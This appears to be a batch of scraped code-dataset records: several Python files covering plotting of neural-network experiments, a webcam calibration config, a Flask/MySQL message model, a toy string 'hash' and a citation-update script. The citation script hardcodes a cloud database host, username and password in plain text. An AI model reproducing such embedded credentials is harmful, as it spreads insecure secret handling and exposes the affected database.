\"\"\"\n Plots the given activation functions on the same figure\n \"\"\"\n\n x = np.linspace(-5, 5, 50)\n x = torch.tensor(x)\n fig, ax = plt.subplots(figsize=(7,5))\n\n for fn in act_fns:\n y = fn(x)\n ax.plot(x, y, label=str(fn))\n\n ax.legend()\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n \n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/act_fns/\")\n fn_names = \" & \".join([str(fn) for fn in act_fns])\n filename = f\"{fn_names}.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300)\n\n def plot_prediction(self, pred_type=\"linear\"):\n \"\"\"\n \"\"\"\n\n # pull data\n df, case_dict, index_cols = self.stats_processor.load_final_acc_df(self.refresh)\n df_groups = df.groupby(index_cols)\n\n # plot\n fig, ax = plt.subplots(figsize=(9,12))\n\n\n\n def scatter_final_acc(self, dataset, net_names, schemes, act_fns):\n \"\"\"\n Plot a scatter plot of predicted vs actual final accuracy for the \n given mixed cases.\n\n Args:\n net_names\n schemes\n act_fns\n \"\"\"\n\n # pull data\n df, case_dict, index_cols = self.stats_processor.load_final_acc_df(self.refresh)\n df_groups = df.groupby(index_cols)\n\n # plot\n fig, ax = plt.subplots(figsize=(14,14))\n fmts = [\".\", \"^\"]\n mfcs = [\"None\", None]\n clrs = sns.color_palette(\"husl\", len(mixed_cases))\n\n # plot mixed cases\n i = 0\n for g in df_groups.groups:\n\n gset, net, scheme, case = g\n\n g_data = df_groups.get_group((dataset, net, scheme, case))\n fmt = fmts[net_names.index(net)]\n mfc = mfcs[schemes.index(scheme)]\n clr = clrs[mixed_cases.index(case)]\n\n # actual\n y_act = g_data[\"final_val_acc\"][\"mean\"].values[0]\n y_err = g_data[\"final_val_acc\"][\"std\"].values[0] * 2\n\n # prediction - get component cases...\n x_pred = component_accs.mean()\n x_err = component_stds.mean()\n \n # plot\n ax.errorbar(x_pred, y_act, xerr = x_err, yerr=y_err, \n label=f\"{net} {scheme} {case}\", \n elinewidth=1, c=clr, fmt=fmt, markersize=10,\n markerfacecolor=mfc)\n\n i += 1\n\n # plot reference line\n x = np.linspace(0, 1, 50)\n ax.plot(x, x, c=(0.5, 0.5, 0.5, 0.25), dashes=[6,2])\n\n # set figure text\n ax.set_title(f\"Linear predicted vs actual mixed case final accuracy - {dataset}\", fontsize=18)\n ax.set_xlabel(\"Predicted\", fontsize=16)\n ax.set_ylabel(\"Actual\", fontsize=16)\n ax.set_xlim([0.1, 1])\n ax.set_ylim([0.1, 1])\n ax.set_aspect(\"equal\", \"box\")\n ax.legend()\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/scatter/{dataset}\")\n net_names = \", \".join(net_names)\n schemes = \", \".join(schemes)\n act_fns = \", \".join(act_fns)\n filename = f\"{net_names}_{schemes}_{act_fns}_scatter.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n\n def plot_final_accuracy(self, net_name, control_cases, mixed_cases):\n \"\"\"\n Plot accuracy at the end of training for given control cases\n and mixed case, including predicted mixed case accuracy based\n on linear combination of control cases\n \"\"\"\n\n # pull data\n acc_df, case_dict = self.stats_processor.load_final_acc_df(\n net_name, control_cases + mixed_cases)\n acc_df_groups = acc_df.groupby(\"case\")\n\n # plot...\n handles = []\n labels = []\n\n fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(14,8), sharey=True)\n fig.subplots_adjust(wspace=0)\n clrs = sns.color_palette(\"hls\", len(control_cases) + 2 * len(mixed_cases))\n \n for i in range(len(control_cases)):\n\n case = control_cases[i]\n group = acc_df_groups.get_group(case)\n p = float(case_dict[case][0])\n\n # error bars = 2 standard devs\n yvals = group[\"final_val_acc\"][\"mean\"].values\n yerr = group[\"final_val_acc\"][\"std\"].values * 2\n h = axes[0].errorbar(p, yvals[0], yerr=yerr, label=case,\n capsize=3, elinewidth=1, c=clrs[i], fmt=\".\")\n \n handles.append(h)\n labels.append(case)\n \n # plot mixed case\n for i in range(len(mixed_cases)):\n\n mixed_case = mixed_cases[i]\n\n # actual\n group = acc_df_groups.get_group(mixed_case)\n y_act = group[\"final_val_acc\"][\"mean\"].values[0]\n y_err = group[\"final_val_acc\"][\"std\"].values * 2\n l = f\"{mixed_case} actual\"\n h = axes[1].errorbar(i, y_act, yerr=y_err, label=l,\n capsize=3, elinewidth=1, c=clrs[len(control_cases) + i], fmt=\".\")\n \n labels.append(l)\n handles.append(h)\n\n # predicted\n ps = [p for p in case_dict[mixed_case]]\n component_cases = [k for k, v in case_dict.items() if len(v) == 1 and v[0] in ps]\n y_pred = acc_df[\"final_val_acc\"][\"mean\"][component_cases].mean()\n l = f\"{mixed_case} prediction\"\n h = axes[1].plot(i, y_pred, \"x\", label=l,\n c=clrs[len(control_cases) + i + 1])\n\n labels.append(l)\n handles.append(h)\n\n fig.suptitle(\"Final accuracy\")\n axes[0].set_xlabel(\"Activation function parameter value\")\n axes[1].set_xlabel(\"Mixed cases\")\n axes[0].set_ylabel(\"Final validation accuracy\")\n axes[1].xaxis.set_ticks([])\n\n # shrink second axis by 20%\n box = axes[1].get_position()\n axes[1].set_position([box.x0, box.y0, box.width * 0.8, box.height])\n\n # append legend to second axis\n axes[1].legend(handles, labels, loc='center left', bbox_to_anchor=(1, 0.5))\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/final accuracy/\")\n cases = \" & \".join(mixed_cases)\n filename = f\"{cases} final acc.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n\n def plot_accuracy(self, dataset, net_name, schemes, cases):\n \"\"\"\n Plots accuracy over training for different experimental cases.\n\n Args:\n dataset\n net_name\n schemes\n cases (list): Experimental cases to include in figure.\n\n Returns:\n None.\n\n \"\"\"\n # pull data\n acc_df = self.stats_processor.load_accuracy_df(dataset, net_name, \n cases, schemes)\n\n # group and compute stats\n acc_df.set_index([\"train_scheme\", \"case\", \"epoch\"], inplace=True)\n acc_df_groups = acc_df.groupby([\"train_scheme\", \"case\", \"epoch\"])\n acc_df_stats = acc_df_groups.agg({ \"acc\": [np.mean, np.std] })\n acc_df_stats_groups = acc_df_stats.groupby([\"train_scheme\", \"case\"])\n \n # plot\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", len(acc_df_stats_groups.groups))\n \n for group, clr in zip(acc_df_stats_groups.groups, clrs):\n\n scheme, case = group\n group_data = acc_df_stats_groups.get_group((scheme, case))\n\n # error bars = 2 standard devs\n yvals = group_data[\"acc\"][\"mean\"].values\n yerr = group_data[\"acc\"][\"std\"].values * 2\n ax.plot(range(len(yvals)), yvals, label=f\"{scheme} {case}\", c=clr)\n ax.fill_between(range(len(yvals)), yvals - yerr, yvals + yerr,\n alpha=0.1, facecolor=clr)\n \n ax.set_title(\"Classification accuracy during training\")\n ax.set_xlabel(\"Epoch\")\n ax.set_ylabel(\"Validation accuracy\")\n ax.legend()\n step = 5\n ax.set_xticks([i * step for i in range(int((len(yvals) + 1)/step))])\n \n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n \n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{dataset}/{net_name}/accuracy/\")\n case_names = \" & \".join(cases)\n filename = f\"{case_names} accuracy.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n \n def plot_type_specific_weights(self, net_name, case):\n \"\"\"\n Plots mean absolute weights for each cell type across layers \n \"\"\"\n\n # pull data\n df = self.stats_processor.load_weight_df(net_name, case)\n\n # plot\n state_keys = list(nets[net_name][\"state_keys\"].keys())\n x = np.array([i * 1.25 for i in range(len(state_keys))])\n n_act_fns = len(df.index.levels[1])\n width = 1.0 / n_act_fns\n err_kw = dict(lw=1, capsize=3, capthick=1)\n\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", n_act_fns)\n\n for i in range(n_act_fns):\n\n act_fn = df.index.levels[1][i]\n\n yvals = df[\"avg_weight\"][:, act_fn][state_keys]\n yerr = df[\"sem_weight\"][:, act_fn][state_keys]\n\n ax.bar(x, yvals, width, yerr=yerr, label=act_fn, error_kw=err_kw, \n color=clrs[i])\n\n # update bar locations for next group\n x = [loc + width for loc in x]\n\n ax.set_title(\"Weight distribution across layers after training\")\n ax.set_xlabel(\"Layer\")\n ax.set_ylabel(\"Mean abs weight per layer\")\n ax.legend()\n\n loc = (n_act_fns - 1) / (2. * n_act_fns)\n ax.set_xticks([loc + i * 1.25 for i in range(len(state_keys))])\n labels = list(nets[net_name][\"state_keys\"].values())\n ax.set_xticklabels(labels)\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/weight distr/\")\n filename = f\"{case} weight distr.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300) \n\n\n def plot_weight_changes(self, net_name, cases, train_schemes):\n \"\"\"\n Plots average change in weights over training for the given\n experimental cases.\n\n Args:\n cases (list): Experimental cases to include in figure.\n\n Returns:\n None.\n\n \"\"\"\n # pull data\n df = self.stats_processor.load_weight_change_df(net_name, cases, train_schemes)\n\n state_keys = df.columns.to_list()\n sem_cols = list(filter(lambda x: x.endswith(\".sem\"), df.columns))\n df_groups = df.groupby([\"train_scheme\", \"case\"])\n\n # plot\n x = np.array([i * 1.25 for i in range(len(state_keys))])\n width = 1.0 / len(cases)\n err_kw = dict(lw=1, capsize=3, capthick=1)\n\n fig, ax = plt.subplots(figsize=(14,8))\n clrs = sns.color_palette(\"hls\", len(cases))\n\n for i in range(len(cases)):\n\n case = cases[i]\n group = df_groups.get_group(case)\n yvals = group[state_keys].values[0]\n yerr = group[sem_cols].values[0]\n\n ax.bar(x, yvals, width, yerr=yerr, label=case, error_kw=err_kw, \n color=clrs[i])\n\n # update bar locations for next group\n x = [loc + width for loc in x]\n\n ax.set_title(\"Weight changes by layer during training\")\n ax.set_xlabel(\"Layer\")\n ax.set_ylabel(\"Mean abs weight change per layer\")\n ax.legend()\n\n loc = (len(cases) - 1) / (2. * len(cases))\n ax.set_xticks([loc + i * 1.25 for i in range(len(state_keys))])\n labels = [k[:-7] for k in df.columns if k.endswith(\".weight\")]\n ax.set_xticklabels(labels)\n\n # optional saving\n if not self.save_fig:\n print(\"Not saving.\")\n plt.show()\n return\n\n sub_dir = ensure_sub_dir(self.data_dir, f\"figures/{net_name}/weight change/\")\n cases = \" & \".join(cases)\n filename = f\"{cases} weight.png\"\n filename = os.path.join(sub_dir, filename)\n print(f\"Saving... {filename}\")\n plt.savefig(filename, dpi=300)\n \n\nif __name__==\"__main__\":\n \n visualizer = Visualizer(\"/home/briardoty/Source/allen-inst-cell-types/data_mountpoint\", \n 10, save_fig=False, refresh=False)\n \n # visualizer.plot_type_specific_weights(\"swish10-tanhe1-relu\")\n\n # visualizer.plot_final_accuracy([\"swish_0.5\", \"swish_1\", \"swish_3\", \"swish_5\", \"swish_10\"], [\"swish_1-3\", \"swish_5-10\"])\n\n # visualizer.plot_weight_changes([\"unmodified\"], [\"adam\"])\n \n # visualizer.plot_accuracy(\"cifar10\", \"vgg11\", [\"adam\"], [\"control\", \"swish10\", \"tanhe1\", \"swish10-tanhe1\"])\n \n visualizer.scatter_final_acc(\"imagenette2\", \n [\"vgg11\", \"sticknet8\"], \n [\"adam\", \"sgd\"], \n [\"swish\", \"tanhe\"])\n\n # visualizer.plot_activation_fns([Sigfreud(1), Sigfreud(1.5), Sigfreud(2.), Sigfreud(4.)])\n # visualizer.plot_activation_fns([Swish(3), Swish(5), Swish(10)])\n # visualizer.plot_activation_fns([Tanhe(0.1), Tanhe(0.5), Tanhe(1), Tanhe(10)])\n # visualizer.plot_activation_fns([Renlu(0.5), Renlu(1), Renlu(1.5)])\n","sub_path":"modules/Visualizer.py","file_name":"Visualizer.py","file_ext":"py","file_size_in_byte":15776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177828758","text":"\n# Inherent Properties\n# Link https://support.logitech.com/en_us/product/hd-pro-webcam-c910/specs\nCAM_NAME = 'logitech C910'\nCAM_RESOLUTION = [640,480] # pixel\nCAM_RATIO = [4,3]\nCAM_DIAGONAL_FOV = 83.0 #degrees\n\n# Dependent on physical set up\nCAM_DISTANCE_TO_SURFACE = 3.0 # meters\nCAM_ANGLE_TO_SURFACE = 90.0 #degrees\n\n# EVALUATING THE DISTANCE PER PIXEL\nimport math\nimport numpy as np\n\ndiagDist = CAM_DISTANCE_TO_SURFACE * math.tan(math.radians(CAM_DIAGONAL_FOV/2))\nwidthRatio = CAM_RATIO[0]/np.linalg.norm(CAM_RATIO)\nheightRatio = CAM_RATIO[1]/np.linalg.norm(CAM_RATIO)\n# conversion of pixel to metric\nCAM_PIXELS_TO_X = diagDist * widthRatio/CAM_RESOLUTION[0]\nCAM_PIXELS_TO_Y = diagDist * heightRatio/CAM_RESOLUTION[1]\n# clear not used values\ndel diagDist,widthRatio,heightRatio\n","sub_path":"src/vision/src/CamConfig_logitechC910.py","file_name":"CamConfig_logitechC910.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"95127335","text":"from flask_app.config.mysqlconnection import connectToMySQL\n\nclass Message:\n def __init__( self , data ):\n self.user_id = data['user_id']\n self.message = data['message']\n self.receiver_id = data['receiver_id']\n\n @classmethod\n def save_message( cls , data ):\n query = \"INSERT INTO messages ( user_id, receiver_id, message ) VALUES (%(user_id)s,%(receiver_id)s, %(message)s);\"\n return connectToMySQL('users').query_db( query, data)\n\n @classmethod\n def get_all_messages(cls, data):\n query = \"SELECT * FROM users.messages WHERE receiver_id = %(user_id)s;\"\n results = connectToMySQL('users').query_db(query, data)\n messages = []\n for message in results:\n messages.append( cls(message) )\n return messages\n\n \n @classmethod\n def get_from_author(cls, data:dict):\n query = \"SELECT * FROM users JOIN messages ON users.id = messages.user_id JOIN users ON messages.id = messages.receiver_id WHERE receiver_id = %(receiver_id)s;\"\n results = connectToMySQL('users').query_db(query, data)\n messages = []\n for message in results:\n messages.append(cls(message))\n print (messages)\n return messages\n\n\n # @classmethod\n # def get_byid(cls, data:dict):\n # query = \"SELECT * FROM authors JOIN favorite ON authors.id = favorite.author_id JOIN books ON books.id = favorite.book_id WHERE author_id = %(author_id)s;\"\n # results = connectToMySQL('authorsbooks').query_db(query, data)\n # favorites = []\n # for favorite in results:\n # favorites.append(cls(favorite))\n # return favorites\n\n\n @classmethod\n def delete_byid(cls, data):\n query = \"DELETE FROM favorite WHERE book_id = %(book_id)s AND author_id = %(author_id)s;\"\n return connectToMySQL('authorsbooks').query_db(query, data)\n\n # @classmethod\n # def save(cls, data ):\n # query = \"INSERT INTO favorite ( name, created_at , updated_at) VALUES ( %(name)s, NOW() , NOW() );\"\n # return connectToMySQL('authorsbooks').query_db( query, data )\n\n # @classmethod\n # def update(cls, data ):\n # query = \"UPDATE authors SET( name ) VALUES ( %(name)s , NOW() , NOW() ) WHERE id = %(id)s;\"\n # return connectToMySQL('authorsbooks').query_db( query, data ) ","sub_path":"flask_app/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"632768681","text":"\"\"\"\nPlot planes from joint analysis files.\n\nUsage:\n plot_slices.py EXP_NAME ... [--output=]\n\nOptions:\n EXP_NAME # Name of experiment to add switchboard module path\n --output= # Output directory [default: ./outputs]\n\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.ioff()\nfrom dedalus.extras import plot_tools\n# Import modified version of plot bot\nfrom plot_tools_mod import plot_bot_3d_mod\n\n###############################################################################\n# Helper functions\n\ndef build_vp_dicts():\n bp_dict = {'vp_name': \"Background Profile\",\n 'vp_task': 'bp',\n 'vp_xlabel':r'$N$ (s$^{-1}$)'}\n sl_dict = {'vp_name': \"Sponge Layer\",\n 'vp_task': 'sl',\n 'vp_xlabel':r'$C_\\nu$'}\n rf_dict = {'vp_name': \"Rayleigh Friction\",\n 'vp_task': 'rf',\n 'vp_xlabel':r'$C_{rf}$ (s$^{-1}$)'}\n return bp_dict, sl_dict, rf_dict\n\n# Sets parameters according to the switchboard settings\ndef flip_the_switches(plot_all_variables, plot_sl_profile, plot_rf_profile, use_sponge, use_sst, T):\n bp_dict, sl_dict, rf_dict = build_vp_dicts()\n if plot_all_variables:\n tasks = ['b', 'p', 'u', 'w']\n nrows, ncols = 2, 2\n l_vp = None\n r_vp = None\n else:\n tasks = ['w']\n l_vp = bp_dict\n nrows, ncols = 1, 3\n if use_sponge and plot_sl_profile:\n r_vp = sl_dict\n else:\n if plot_rf_profile:\n r_vp = rf_dict\n else:\n nrows, ncols = 1, 2\n r_vp = rf_dict\n if use_sst: # Stop Simulation Time, opposed to Stop Simulation Period\n title_str = r'{:}, $t$ = {:2.3f}'\n time_factor = 1.0\n else:\n title_str = r'{:}, $t/T$ = {:2.3f}'\n time_factor = T\n return tasks, nrows, ncols, title_str, time_factor, l_vp, r_vp\n\n# Adds the title to a frame\ndef add_frame_title(fig, file, index, title_func):\n title = title_func(file['scales/sim_time'][index])\n fig.suptitle(title, fontsize='large')\n\n# Saves figure as a frame\ndef save_fig_as_frame(fig, file, index, savename_func, output, dpi):\n savename = savename_func(file['scales/write_number'][index])\n savepath = output.joinpath(savename)\n fig.savefig(str(savepath), dpi=dpi)\n fig.clear()\n\n# Plots one frame of one task (b, p, u, or w)\ndef plot_one_task(n, ncols, mfig, file, task, index, x_lims, y_lims, n_clrbar_ticks, abs_line):\n # Build subfigure axes\n i, j = divmod(n, ncols)\n axes = mfig.add_axes(i, j, [0, 0, 1, 1])\n # Call 3D plotting helper, slicing in time\n dset = file['tasks'][task]\n # title is usually equal to `task`\n plot_bot_3d_mod(dset, 0, index, x_limits=x_lims, y_limits=y_lims, n_cb_ticks=n_clrbar_ticks, clim=[-1.3E-3,1.3E-3], axes=axes, title=r'Vertical Velocity $(m/s)$', even_scale=True, abs_div=abs_line)\n #plot_bot_3d_mod(dset, 0, index, x_limits=x_lims, y_limits=y_lims, n_cb_ticks=n_clrbar_ticks, axes=axes, title=task, even_scale=True, abs_div=abs_line)\n\n# Extracts relevant arrays from a vertical profile snapshot\ndef extract_vp_snapshot(task_name, snap_dir, vp_snaps):\n vp_snap_filepath = snap_dir + '/' + vp_snaps + '/' + vp_snaps + '_s1.h5'\n with h5py.File(vp_snap_filepath, mode='r') as file:\n data = file['tasks'][task_name]\n temp = data[()]\n hori = temp[0][0]\n z_ = file['scales']['z']['1.0']\n vert = z_[()]\n return hori, vert\n\ndef add_vp_buffers(ax, buffer, extra_buffer, ylims=None):\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n # Check if its a constant vertical profile\n if xrange==0:\n xleft = xvals[0] - extra_buffer\n xright = xvals[1] + extra_buffer\n else:\n xleft = xvals[0] - buffer\n xright = xvals[1] + buffer\n ax.set_xlim(xleft, xright)\n if ylims==None:\n yrange = yvals[1]-yvals[0]\n ytop = yvals[1] + buffer\n ybott = yvals[0]\n else:\n ytop = ylims[1] + buffer\n ybott = ylims[0]\n ax.set_ylim(ybott, ytop)\n\n# Set a fixed aspect ratio on matplotlib plots regardless of axis units\ndef fixed_aspect_ratio(ax, ratio, ylims=None):\n # Does not work for twin axes plots\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n if ylims==None:\n yrange = yvals[1]-yvals[0]\n else:\n yrange = ylims[1]-ylims[0]\n ax.set_aspect(ratio*(xrange/yrange), adjustable='box')\n\n# Set a fixed aspect ratio on matplotlib plots regardless of axis units\ndef fixed_aspect_ratio2(ax, ratio, ylims=None):\n # Does not work for twin axes plots\n xvals,yvals = ax.get_xlim(), ax.get_ylim()\n xrange = xvals[1]-xvals[0]\n if ylims==None:\n yrange = yvals[1]-yvals[0]\n else:\n yrange = ylims[1]-ylims[0]\n aspect_ratio = ratio*(xrange/yrange)\n ax.set_aspect(aspect_ratio, adjustable='datalim')\n\ndef make_twin_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori=None, rvert=None, twin=False):\n axes0.plot(hori, vert, 'k-')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes0, buffer, extra_buffer, ylims)\n if twin:\n axes1 = axes0.twiny()\n axes1.plot(rhori, rvert, 'g-')\n axes1.tick_params(axis='x', colors='g')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes1, buffer, extra_buffer, ylims)\n # Force display aspect ratio\n fixed_aspect_ratio2(axes0, dis_ratio, ylims)\n fixed_aspect_ratio2(axes1, dis_ratio, ylims)\n else:\n # Force display aspect ratio\n fixed_aspect_ratio(axes0, dis_ratio, ylims)\n # Add horizontal line to divide absorption layer\n axes0.axhline(y=abs_line, color='gray', ls='--')\n return axes0\n\ndef make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori=None, rvert=None, twin=False):\n axes0.plot(hori, vert, 'k-')\n if twin:\n axes0.plot(rhori, rvert, 'g-')\n # Add buffers around the edge to make plot look nice\n add_vp_buffers(axes0, buffer, extra_buffer, ylims)\n # Force display aspect ratio\n fixed_aspect_ratio(axes0, dis_ratio, ylims)\n # Add horizontal line to divide absorption layer\n axes0.axhline(y=abs_line, color='gray', ls='--')\n return axes0\n\n# Adds vertical profile plot to the left of animation\ndef plot_vp_on_left(l_vp, r_vp, snap_dir, vp_snaps, mfig, buffer, extra_buffer, dis_ratio, abs_line, ylims=None, twin=False):\n axes0 = mfig.add_axes(0, 0, [0, 0, 1.3, 1])#, sharey=axes1)\n axes0.set_title(l_vp['vp_name'])\n axes0.set_xlabel(l_vp['vp_xlabel'])\n axes0.set_ylabel(r'$z$ (m)')\n # Get arrays of background profile values\n lhori, lvert = extract_vp_snapshot(l_vp['vp_task'], snap_dir, vp_snaps)\n # Get arrays of background profile values\n rhori, rvert = extract_vp_snapshot(r_vp['vp_task'], snap_dir, vp_snaps)\n make_twin_plot(axes0, lhori, lvert, buffer, extra_buffer, ylims, dis_ratio, abs_line, rhori, rvert, twin)\n #make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line)\n return axes0\n\n# Adds vertical profile plot to the right of animation\ndef plot_vp_on_right(r_vp, snap_dir, vp_snaps, mfig, buffer, extra_buffer, dis_ratio, abs_line, ylims=None):\n axes0 = mfig.add_axes(0, 2, [0, 0, 1.3, 1])\n axes0.set_title(r_vp['vp_name'])\n axes0.set_xlabel(r_vp['vp_xlabel'])\n axes0.set_ylabel(r'$z$ (m)')\n # Get arrays of background profile values\n hori, vert = extract_vp_snapshot(r_vp['vp_task'], snap_dir, vp_snaps)\n make_vp_plot(axes0, hori, vert, buffer, extra_buffer, ylims, dis_ratio, abs_line)\n return axes0\n\n###############################################################################\n###############################################################################\n\ndef main(filename, start, count, output):\n \"\"\"Save plot of specified tasks for given range of analysis writes.\"\"\"\n\n # To import the switchboard\n import sys\n switch_path = \"../\" + NAME\n sys.path.insert(0, switch_path) # Adds higher directory to python modules path\n import switchboard as sbp\n\n # Get relevant parameters from switchboard used in loop\n plot_all = sbp.plot_all_variables\n n_clrbar_ticks = sbp.n_clrbar_ticks\n # Display parameters\n x_f = sbp.x_0 + sbp.L_x_dis\n z_b = sbp.z_0 - sbp.L_z_dis\n\n # Calculate aspect ratio\n AR = sbp.L_x_dis / sbp.L_z_dis\n # Set tuples for display boundaries\n x_lims = [sbp.x_0, x_f]\n y_lims = [z_b, sbp.z_0]\n\n # Change the size of the text overall\n font = {'size' : sbp.font_size}\n plt.rc('font', **font)\n # Set parameters based on switches\n tasks, nrows, ncols, title_str, time_factor, l_vp, r_vp = flip_the_switches(plot_all, sbp.plot_sponge, sbp.plot_rf, sbp.use_sponge, sbp.use_stop_sim_time, sbp.T)\n # Plot settings\n scale = sbp.scale\n dpi = sbp.dpi\n title_func = lambda sim_time: title_str.format('',sim_time/time_factor)\n #title_func = lambda sim_time: title_str.format(NAME, sim_time/time_factor)\n savename_func = lambda write: 'write_{:06}.png'.format(write)\n # Layout\n image = plot_tools.Box(AR, 1)\n pad = plot_tools.Frame(0.2, 0.2, 0.15, 0.15)\n margin = plot_tools.Frame(0.3, 0.2, 0.1, 0.1)\n\n # Create multifigure\n mfig = plot_tools.MultiFigure(nrows, ncols, image, pad, margin, scale)\n fig = mfig.figure\n # Plot writes\n with h5py.File(filename, mode='r') as file:\n for index in range(start, start+count):\n for n, task in enumerate(tasks):\n if (plot_all == False):\n # Plot stratification profile on the left\n ax0 = plot_vp_on_left(l_vp, r_vp, output_dir+'/'+sbp.snapshots_dir, sbp.vp_snap_dir, mfig, sbp.buffer, sbp.extra_buffer, sbp.vp_dis_ratio, sbp.abs_div, y_lims, sbp.plot_twin)\n if r_vp!=None:\n ax1 = plot_vp_on_right(r_vp, output_dir+'/'+sbp.snapshots_dir, sbp.vp_snap_dir, mfig, sbp.buffer, sbp.extra_buffer, sbp.vp_dis_ratio, sbp.abs_div, y_lims)\n # shift n so that animation is on the right side\n n = 1\n plot_one_task(n, ncols, mfig, file, task, index, x_lims, y_lims, n_clrbar_ticks, sbp.abs_div)\n # Add title to frame\n add_frame_title(fig, file, index, title_func)\n # Save figure\n save_fig_as_frame(fig, file, index, savename_func, output, dpi)\n plt.close(fig)\n\n###############################################################################\nif __name__ == \"__main__\":\n\n import pathlib\n from docopt import docopt\n from dedalus.tools import logging\n from dedalus.tools import post\n from dedalus.tools.parallel import Sync\n\n args = docopt(__doc__)\n\n NAME = str(args['EXP_NAME'])\n\n output_dir = str(args['--output'])\n output_path = pathlib.Path(output_dir + '/frames').absolute()\n # Create output directory if needed\n with Sync() as sync:\n if sync.comm.rank == 0:\n if not output_path.exists():\n output_path.mkdir()\n post.visit_writes(args[''], main, output=output_path)\n","sub_path":"_modules_other/plot_slices.py","file_name":"plot_slices.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"513319291","text":"#!/usr/bin/env python3\nfrom textwrap import wrap\n\ndef bitShift(ary):\n shiftVal = 3\n intAry = []\n rtnString = ''\n\n for x in ary:\n intAry.append(ord(x))\n\n for y in intAry:\n newString = str(y << shiftVal)\n rtnString += newString\n\n return rtnString\n\ndef hash(plainString):\n # hashed = plainString\n n = len(plainString)//4\n c = plainString[n*2:n*3]\n shiftC = bitShift(c)\n # hashed = A + B + shiftC + D\n hashed = shiftC\n return hashed\n\ndef main():\n \"\"\" Main entry point of the app \"\"\"\n print(\"hello world\")\n inputStr = input(\"Enter string to be hashed: \")\n n = len(inputStr)//4\n a = inputStr[0:n]\n b = inputStr[n:n*2]\n c = inputStr[n*2:n*3]\n d = inputStr[n*3:len(inputStr)]\n print(a)\n print(b)\n print(c)\n print(d)\n if len(a) == 0 or len(b) == 0 or len(c) == 0 or len(d) == 0:\n raise Exception('Error string not long enough')\n print(f'Hashed string: {hash(inputStr)}')\n\n\nif __name__ == \"__main__\":\n \"\"\" This is executed when run from the command line \"\"\"\n main()\n","sub_path":"assn.py","file_name":"assn.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314072646","text":"import mysql.connector as connector\r\nimport CitationRetrieval\r\n\r\nfrom datetime import datetime\r\ncurrDate = datetime.now().strftime('%B')+\"_\"+str(datetime.now().year)\r\n\r\ndatabase = connector.connect(host='citations.clqyzvodepst.us-east-1.rds.amazonaws.com',database='citations',user='admin',password='adminroot')\r\ncursor=database.cursor()\r\n\r\ncursor.execute('select orcid from report')\r\nids=cursor.fetchall()\r\norcids=[]\r\nfor i in ids:\r\n orcids.append(i[0])\r\n\r\ncursor.execute('desc report')\r\nret=cursor.fetchall()\r\navail=[]\r\nfor i in ret:\r\n avail.append(i[0])\r\n\r\nif currDate not in avail:\r\n cursor.execute('alter table report add column '+currDate+' VARCHAR(45)')\r\n for i in orcids:\r\n cursor.execute('update report set '+currDate+' = \\''+str(CitationRetrieval.citeCount(i))+'\\' where orcid = \\''+i+'\\'')\r\nelse:\r\n for i in orcids:\r\n cursor.execute('update report set '+currDate+' = \\''+str(CitationRetrieval.citeCount(i))+'\\' where orcid = \\''+i+'\\'')","sub_path":"accessFromDBhost.py","file_name":"accessFromDBhost.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"307196038","text":"# -*- coding:utf-8 -*-\n\"\"\"\n-------------------룬팩 2,3,4 데이터 구조\n맨 처음에 헤더가 남습니다. 리틀엔디안 방식으로 4바이트로 끊어서\n[매직스탬프 TEXT] [총 대사 갯수] [대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n[대사길이] [대사 시작오프셋][대사길이] [대사 시작오프셋]\n...\n반복입니다.\n\n주의!!!\n추출했을때 \\n 은 줄띄는 \"새줄 문자\"라는 것으로 